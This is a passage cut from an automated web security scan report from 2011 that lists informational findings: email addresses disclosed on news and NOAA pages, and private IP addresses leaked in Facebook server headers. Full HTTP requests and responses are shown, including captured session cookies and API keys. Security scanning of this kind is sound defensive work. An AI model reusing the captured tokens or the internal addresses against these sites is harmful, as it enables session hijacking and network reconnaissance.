Cache-Control: max-age=600
Expires: Mon, 09 May 2011 15:06:57 GMT
Last-Modified: Wed, 27 Apr 2011 14:45:18 GMT
Keep-Alive: timeout=10, max=4930
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding, User-Agent
Content-Length: 175362


(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

20.19. http://www.srh.noaa.gov/cte.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /cte.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /cte.htm HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 176
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:36:07 GMT
Content-Length: 8089
Content-Type: text/html; charset=UTF-8
Server: Apache
Last-Modified: Fri, 23 Oct 2009 16:25:29 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.20. http://www.srh.noaa.gov/lmrfc/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lmrfc/?n=lmrfc-mississippiandohioriverforecast HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 17853
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:SR-LMRFC.Webmaster@noaa.gov?Subject=LMRFC Feedback" title="Contact Us">
...[SNIP]...
<a href="mailto:sr-lmrfc.webmaster@noaa.gov">sr-lmrfc.webmaster@noaa.gov</a>
...[SNIP]...

20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /lmrfc/quickbrief.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lmrfc/quickbrief.php HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/?n=lmrfc-mississippiandohioriverforecast
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 550
Date: Mon, 09 May 2011 15:27:17 GMT
Content-Length: 36981
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:SR-LMRFC.Webmaster@noaa.gov?Subject=LMRFC Feedback" title="Contact Us">
...[SNIP]...
<a href="mailto:sr-lmrfc.webmaster@noaa.gov">sr-lmrfc.webmaster@noaa.gov</a>
...[SNIP]...

20.22. http://www.srh.noaa.gov/srh.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.srh.noaa.gov
Path:   /srh.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /srh.htm HTTP/1.1
Host: www.srh.noaa.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/cte.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Length: 6292
Content-Type: text/html; charset=UTF-8
Server: Apache
Last-Modified: Thu, 03 May 2007 21:19:11 GMT
Via: 1.1 hyacinth (NetCache NetApp/6.0.3)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:SR-SRH.Webmaster@noaa.gov">SR-SRH.Webmaster@noaa.gov</a>
...[SNIP]...

20.23. http://www.therepublic.com/assets/gzip.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/gzip.php

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/gzip.php?cache=true&f0=scripts/jquery/js/jquery-1.3.2.min.js&f1=scripts/jquery/js/jquery.fadetransition.js&f2=scripts/jquery/js/jquery-ui-1.7.2.custom.min.js&f3=scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Expires: Thu, 12 May 2011 15:37:30 GMT
Content-Type: text/javascript; charset: UTF-8
Content-Length: 203067

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.24. http://www.therepublic.com/assets/scripts/menu/menu.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/scripts/menu/menu.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/scripts/menu/menu.js HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Sun, 28 Mar 2010 17:16:20 GMT
ETag: "8340054-3316-482df8f84b700"
Accept-Ranges: bytes
Content-Length: 13078
Cache-Control: max-age=172800, public
Content-Type: application/javascript

/** jquery.color.js ****************/
/*
* jQuery Color Animations
* Copyright 2007 John Resig
* Released under the MIT and GPL licenses.
*/

(function(jQuery){

   // We override the animation for
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.25. http://www.therepublic.com/home/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /home/

Issue detail

The following email address was disclosed in the response:

Request

GET /home/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/login/process/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 64489

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<head>
   <meta name="google-site-verification" content="rDoJHMU_Kg8iBXy4lutSBUULkgdb6uCJc0BnDPddbts
...[SNIP]...
<a href="mailto:editorial@therepublic.com">editorial@therepublic.com</a>
...[SNIP]...

20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_segs=D08734_70008|D08734_72078; rsi_seg=D08734_70008|D08734_72078

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:36:49 GMT
Content-Length: 48607


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicatio
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...

21. Private IP addresses disclosed
There are 30 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.198
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=630
Expires: Mon, 09 May 2011 15:46:23 GMT
Date: Mon, 09 May 2011 15:35:53 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.30.147.196

Request

GET /rsrc.php/v1/zD/r/B4K_BWwP7P5.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff
Cache-Control: max-age=0
If-Modified-Since: Sun, 14 Mar 2010 12:51:27 -0700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:49:56 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=26712696
Expires: Tue, 13 Mar 2012 19:46:44 GMT
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close
Content-Length: 1009

.PNG
.
...IHDR.............l.`o....PLTE...{..p..cy.h~.....................................Jd........................................o.Uk.Pi.MZt.\t.Ys.]v.u.[......_x................[t.Xr.......c{.p.V
...[SNIP]...

21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ze/r/nZW4C56WJb6.png

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.30.148.192

Request

GET /rsrc.php/v1/ze/r/nZW4C56WJb6.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff
Cache-Control: max-age=0
If-Modified-Since: Mon, 15 Mar 2010 07:53:15 -0700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1249
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:54:13 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=26781537
Expires: Wed, 14 Mar 2012 14:54:06 GMT
Date: Mon, 09 May 2011 15:35:09 GMT
Connection: close

.PNG
.
...IHDR...F...#........_....PLTE......---,,,.........///DDDddd***............)))...eee...999.........+++:::.........cccXXX......fffbbbEEE___......ggg222...(((...888000...111UUU...444......WWW
...[SNIP]...

21.4. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.29.48

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28449eda%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b228a95%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df385454f24%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6a6a8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1acce1b18%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20c6a6a8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3597bd174&relation=parent&transport=postmessage&frame=f6312701c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.48
X-Cnection: close
Date: Mon, 09 May 2011 15:35:52 GMT
Content-Length: 0


21.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.69.23

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2860feb1%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f9922e08%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3536d5f4%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1841e87%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21044ecd8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff15c2bf28c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d0509a3&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/learn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1841e87&origin=http%3A%2F%2Fwww.groupon.com%2Ff15c2bf28c&relation=parent&transport=postmessage&frame=f1d0509a3
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.69.23
X-Cnection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Content-Length: 0


21.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.55.25.42

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8892c558%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1db0b9edc%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3bb62792c%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df362cb24e8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df21ef6047%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3d48b0e94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2b7a419f8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/mobile
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f362cb24e8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3d48b0e94&relation=parent&transport=postmessage&frame=f2b7a419f8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.42
X-Cnection: close
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 0


21.7. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.61.54

Request

